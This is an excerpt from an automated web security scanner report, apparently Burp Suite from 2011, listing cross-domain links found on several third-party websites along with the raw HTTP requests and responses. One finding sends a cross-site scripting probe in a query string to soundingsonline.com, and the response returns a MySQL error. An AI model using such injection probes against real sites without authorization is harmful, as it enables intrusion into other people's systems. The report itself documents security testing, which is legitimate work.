Mensfitness.com is a member of the <a href="http://www.spike.com/tribes/" target="_blank">MTVN Tribes</a> anchored by MTVN properties like <a href="http://www.spike.com/tribes/" target="_blank">Spike</a>
...[SNIP]...
</strong> <a href="http://www.fitpregnancy.com" target="_blank">Fit Pregnancy</a> | <a href="http://www.flexonline.com" target="_blank">Flex</a>
...[SNIP]...
</a> | <a href="http://www.muscleandfitness.com" target="_blank">Muscle & Fitness</a> | <a href="http://www.muscleandfitnesshers.com" target="_blank">Muscle & Fitness Hers</a> | <a href="http://www.naturalhealthmag.com" target="_blank">Natural Health</a> | <a href="http://www.shape.com" target="_blank">Shape</a>
...[SNIP]...
</strong> <a href="http://www.countryweekly.com" target="_blank">Country Weekly</a> | <a href="http://www.nationalenquirer.com" target="_blank">National Enquirer</a> | <a href="http://www.starmagazine.com" target="_blank">Star</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-94wNw88f65Rhk.gif?labels=MTVN%20Digital%20Tribes" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-b0iPm4Hn8ATss.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...
<div><img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-mensfitness&cg=0&cc=1" alt="" style="display:none;"/></div>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6036076&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...

<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" SRC="http://kona.kontera.com/javascript/lib/KonaLibInline.js"></script>
...[SNIP]...

20.695. http://www.mindbodygreen.com/passvote.action previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mindbodygreen.com
Path:	/passvote.action

Issue detail

The page was loaded from a URL containing a query string:

http://www.mindbodygreen.com/passvote.action?u={u}

The response contains the following links to other domains:

http://edge.quantserve.com/quant.js
http://itunes.apple.com/us/podcast/mindbodygreen/id367278016
http://pixel.quantserve.com/pixel/p-eaiFKB6Cvl1QU.gif
http://platform.twitter.com/anywhere.js?id=uzgchTGVLmPHLMMS074Lw&v=1
http://www.facebook.com/css/connect/connect_button.css
http://www.google-analytics.com/urchin.js
http://www.youtube.com/user/MindBodyGreen

Request

GET /passvote.action?u={u} HTTP/1.1
Host: www.mindbodygreen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en-US
Date: Tue, 25 Jan 2011 04:46:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/wc.css;jsessionid=BF3B61587E947D9656BC99171A41E74D">
<link rel="stylesheet" type="text/css" href="http://www.facebook.com/css/connect/connect_button.css" />
<link rel="Shortcut Icon" href="/favicon.ico;jsessionid=BF3B61587E947D9656BC99171A41E74D">
<script src="http://platform.twitter.com/anywhere.js?id=uzgchTGVLmPHLMMS074Lw&v=1" type="text/javascript"></script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<div id="youtube" style="text-align:center">
<a href="http://www.youtube.com/user/MindBodyGreen" target="_blank"><img src="/images/youtube-logo.jpg;jsessionid=BF3B61587E947D9656BC99171A41E74D" style="height:49px">
...[SNIP]...
</a>
<a href="http://itunes.apple.com/us/podcast/mindbodygreen/id367278016" target="_blank"><img src="/images/itunes-logo.jpg;jsessionid=BF3B61587E947D9656BC99171A41E74D" style="width:140px">
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-eaiFKB6Cvl1QU.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

20.696. http://www.mister-wong.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mister-wong.com
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.mister-wong.com/index.php?action=addurl&bm_url={u}&bm_description={t}

The response contains the following links to other domains:

http://enimages2.websnapr.com/?size=S&url=
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s3.trafficmaxx.de/thx.php?sid=5f56e4f655419e1d43a94517aa3587aa&java=no&conversionName=&pageCategory=
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/
http://static.mister-wong.de/mootools-1.2-core-more.js
http://www.mister-wong.cn/
http://www.mister-wong.de/
http://www.mister-wong.es/
http://www.mister-wong.fr/
http://www.mister-wong.ru/

Request

GET /index.php?action=addurl&bm_url={u}&bm_description={t} HTTP/1.1
Host: www.mister-wong.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:45 GMT
Server: Apache
Set-Cookie: wongsess=927d30d84dbc263a02394b9ef968dec9; expires=Fri, 25 Jan 2036 10:46:45 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
<link href="/ccss/default.css,buddys.css,dropdown.css,users.css,autocompleter.css,spotlight.css,remooz.css" rel="stylesheet" type="text/css" /><script type="text/javascript" src="http://static.mister-wong.de/mootools-1.2-core-more.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</h1>

   <img src="http://enimages2.websnapr.com/?size=S&url=" alt="" class="websnapr" />

   <div id="ratemenow" style="width:466px; float:left;">
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<li><a href="http://www.mister-wong.de">de</a></li><li><a href="http://www.mister-wong.fr">fr</a></li><li><a href="http://www.mister-wong.es">es</a></li><li><a href="http://www.mister-wong.ru">ru</a></li><li><a href="http://www.mister-wong.cn">cn</a>
...[SNIP]...
</div>
                       <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/" type="text/javascript"></script>
...[SNIP]...
<noscript style="display: none">
   <img src="http://s3.trafficmaxx.de/thx.php?sid=5f56e4f655419e1d43a94517aa3587aa&java=no&conversionName=&pageCategory=" alt="" />
</noscript>
...[SNIP]...

20.697. http://www.netscape.com/submit/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netscape.com
Path:	/submit/

Issue detail

The page was loaded from a URL containing a query string:

http://www.netscape.com/submit/?U={u}&T={t}

The response contains the following link to another domain:

http://netscape.aol.com/

Request

GET /submit/?U={u}&T={t} HTTP/1.1
Host: www.netscape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 05:03:49 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Tue, 25 Jan 2011 05:33:49 GMT
Content-length: 89
Content-type: text/html
Location: http://netscape.aol.com
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive

<html>
<body>
Page relocated <a href="http://netscape.aol.com">here.</a>
</body>
</html>

20.698. http://www.newsvine.com/_wine/save previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_wine/save

Issue detail

The page was loaded from a URL containing a query string:

http://www.newsvine.com/_wine/save?u={u}&h={t}

The response contains the following links to other domains:

http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /_wine/save?u={u}&h={t} HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 05:02:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=da7a4ec87a220913a1e87eace30dd98e; expires=Mon, 20-Jan-2031 05:02:58 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/accounts/login?popoff&redirect=http%3A%2F%2Fwww.newsvine.com%2F_wine%2Fsave%3Fu%3D%7Bu%7D%26h%3D%7Bt%7D
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 15972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascr
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
...[SNIP]...

20.699. http://www.nexternal.com/ecommerce/joomla-shopping-cart.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nexternal.com
Path:	/ecommerce/joomla-shopping-cart.asp

Issue detail

The page was loaded from a URL containing a query string:

http://www.nexternal.com/ecommerce/joomla-shopping-cart.asp?source=google/

The response contains the following links to other domains:

http://community.joomla.org/
http://docs.joomla.org/
http://hc2.humanclick.com/hc/81994923/?cmd=file&file=visitorWantsToChat&site=81994923&byhref=1&imageUrl=http://hc2.humanclick.comhttps://www.nexternal.com/images/
http://twitter.com/nexternal
http://www.joomla.org/

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:06:03 GMT
Server: SERVER
Set-Cookie: homepagelog%5Fid=16003527; expires=Tue, 08-Jan-2013 08:00:00 GMT; path=/
Set-Cookie: SQL=; path=/
P3P: CP="NOI DSP COR CURa OUR NOR"
Cache-control: private
Content-Length: 17852
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Co
...[SNIP]...
</a> has the ability to easily integrate with <a href="http://www.joomla.org" target="joomla">Joomla.s</a>
...[SNIP]...
-of-use and extensibility, have made Joomla one of the most popular website software applications available. Best of all, Joomla is freely available and the latest version can easily be downloaded at <a href="http://www.joomla.org" target="joomla">www.joomla.org</a>
...[SNIP]...
<p>
Utilizing a CMS such as <a href="http://www.joomla.org" target="joomla">Joomla</a>
...[SNIP]...
<p>
If you need assistance with setting up your Joomla website, Joomla provides extensive <a href="http://docs.joomla.org" target="joomla">documentation</a> for you to use. You can also utilize <a href="http://community.joomla.org/" target="joomla">Joomla's Customer Community</a>
...[SNIP]...
<br /><a href='http://hc2.humanclick.com/hc/81994923/?cmd=file&file=visitorWantsToChat&site=81994923&byhref=1&imageUrl=http://hc2.humanclick.comhttps://www.nexternal.com/images/' target='chat81994923' onClick="javascript:window.open('http://hc2.humanclick.com/hc/81994923/?cmd=file&file=visitorWantsToChat&site=81994923&imageUrl=http://hc2.humanclick.comhttps://www.nexternal.com/images/&referrer='+escape(document.location),'chat81994923','width=472,height=320,resizable=yes');return false;"><img src="https://www.nexternal.com/images/button_chat2.jpg" alt="Chat Now with an ECommerce Expert" style="margin: 14px 0 5px 0;" width="86" border="0" height="22" />
...[SNIP]...
</script>
<a id="twitter" href="http://twitter.com/nexternal" title="Nexternal on Twitter" target="twitter"><img src="http://www.nexternal.com/images/twitter_icon_2.gif" alt="Nexternal on Twitter" width="16" height="16" border="0" />
...[SNIP]...

20.700. http://www.officedepot.com/promo.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.officedepot.com
Path:	/promo.do

Issue detail

The page was loaded from a URL containing a query string:

http://www.officedepot.com/promo.do?file=/promo/pages/0928_recycling.jsp

The response contains the following links to other domains:

http://feeds.feedburner.com/OfficeDepot
http://officedepot.lifepics.com/net/Default.aspx?SID=null&odserver=www.officedepot.com
http://officedepot.logoworks.com/?source=od.l7&SID=null&odserver=www.officedepot.com
http://static.atgsvcs.com/js/atgsvcs.js
http://static.www.odcdn.com/1421577119/bundles/cm.js
http://static.www.odcdn.com/1481705167/css/od/speciallinks.css
http://static.www.odcdn.com/1485153267/includes/customerservice.js
http://static.www.odcdn.com/N136538418/bundles/lib.js
http://static.www.odcdn.com/N1804756861/css/od/print.css
http://static.www.odcdn.com/N203069267/css/od/bubble.css
http://static.www.odcdn.com/N444029864/css/od/sitestyle.css
http://static.www.odcdn.com/N931576568/css/od/master.css
http://static.www.odcdn.com/images/us/od/37005_od_rubicks_footer.png
http://static.www.odcdn.com/images/us/od/brand.gif
http://static.www.odcdn.com/images/us/od/common/misc/clear.gif
http://static.www.odcdn.com/images/us/od/favicon.ico
http://static.www.odcdn.com/images/us/od/rss/feed_icon_16x16.gif
http://static.www.odcdn.com/images/us/od/tiles/od_nav_menu_prvt_tile.gif
http://www.ativaproducts.com/?SID=null&odserver=www.officedepot.com
http://www.mystarteacher.com/?SID=ODjejhlyFxrngvsFyFgmYei&odserver=www.officedepot.com&SID=null&odserver=www.officedepot.com
http://www.officedepot.ca/?SID=null&odserver=www.officedepot.com
http://www.officedepotfoundation.org/?SID=null&odserver=www.officedepot.com
http://www.officedepotlistens.com/websurvey/index.htm?SID=null&odserver=www.officedepot.com
http://www.officedepotracing.com/?SID=null&odserver=www.officedepot.com
http://www.school.com/?SID=null&odserver=www.officedepot.com
http://www.techdepot.com/?SID=null&odserver=www.officedepot.com
http://www.worklifereward.com/?SID=null&odserver=www.officedepot.com
https://officedepot.support.com/feature/pccheckup-online?SID=null&odserver=www.officedepot.com
https://www.web-rebates.com/officedepot?SID=null&odserver=www.officedepot.com

Request

GET /promo.do?file=/promo/pages/0928_recycling.jsp HTTP/1.1
Host: www.officedepot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.701. https://www.paperg.com/post.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paperg.com
Path:	/post.php

Issue detail

The page was loaded from a URL containing a query string:

https://www.paperg.com/post.php?bid=2123&pid=3922&post

The response contains the following links to other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
https://ssl.google-analytics.com/urchin.js

Request

GET /post.php?bid=2123&pid=3922&post HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 05:04:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>

       <meta http-equiv="Content-Type" co
...[SNIP]...
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">


       <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</div>
       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...

20.702. http://www.simpy.com/simpy/LinkAdd.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.simpy.com
Path:	/simpy/LinkAdd.do

Issue detail

The page was loaded from a URL containing a query string:

http://www.simpy.com/simpy/LinkAdd.do?href={u}&title={t}

The response contains the following links to other domains:

http://aboutreuters.custhelp.com/cgi-bin/aboutreuters.cfg/php/enduser/ask.php
http://statse.webtrendslive.com/dcsncwimc10000kzgoor3wv9x_3f2v/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.6.0

Request

GET /simpy/LinkAdd.do?href={u}&title={t} HTTP/1.1
Host: www.simpy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:28:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Set-Cookie: SSLB=A;path=/;domain=www.reuters.com;
Content-Length: 4255



<!--[if !IE]> token: d05c62e0-cc08-4af7-b
...[SNIP]...
<p>If you still can't find what you're looking for, you may wish to send a message to the <a href="http://aboutreuters.custhelp.com/cgi-bin/aboutreuters.cfg/php/enduser/ask.php">Help Desk</a>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsncwimc10000kzgoor3wv9x_3f2v/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.6.0"/></div>
...[SNIP]...

20.703. http://www.soundingsonline.com/archives previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/archives

Issue detail

The page was loaded from a URL containing a query string:

http://www.soundingsonline.com/archives?'"--></style></script><script>alert(0x001E2B)</script>

The response contains the following links to other domains:

http://b.collective-media.net/seg/cm/de18_1
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://www.barkerstores.com/soundings
http://www.barkerstores.com/soundings/
http://www.dominionenterprises.com/main/do/Privacy_Policy
http://www.dominionenterprises.com/main/do/Terms_of_Use
http://www.paperg.com/
http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123
http://www.soundingssellmyboat.com/

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:27:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:27:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

20.704. http://www.soundingsonline.com/component/chronocontact/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/chronocontact/

Issue detail

The page was loaded from a URL containing a query string:

http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage

The response contains the following links to other domains:

http://b.collective-media.net/seg/cm/de18_1
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=51M&SOURCE=INT75&RDRID=&SBTYPE=QN&PGTP=S
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=58g&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://www.barkerstores.com/soundings
http://www.barkerstores.com/soundings/
http://www.chronoengine.com/
http://www.dominionenterprises.com/main/do/Privacy_Policy
http://www.dominionenterprises.com/main/do/Terms_of_Use
http://www.paperg.com/
http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123
http://www.soundingssellmyboat.com/

Request

GET /component/chronocontact/?chronoformname=PSPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=58g&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"> <img src="/images/cgaux_graphics/SND.Jul.09.jpg" width="100" border="0" height="135" />
...[SNIP]...
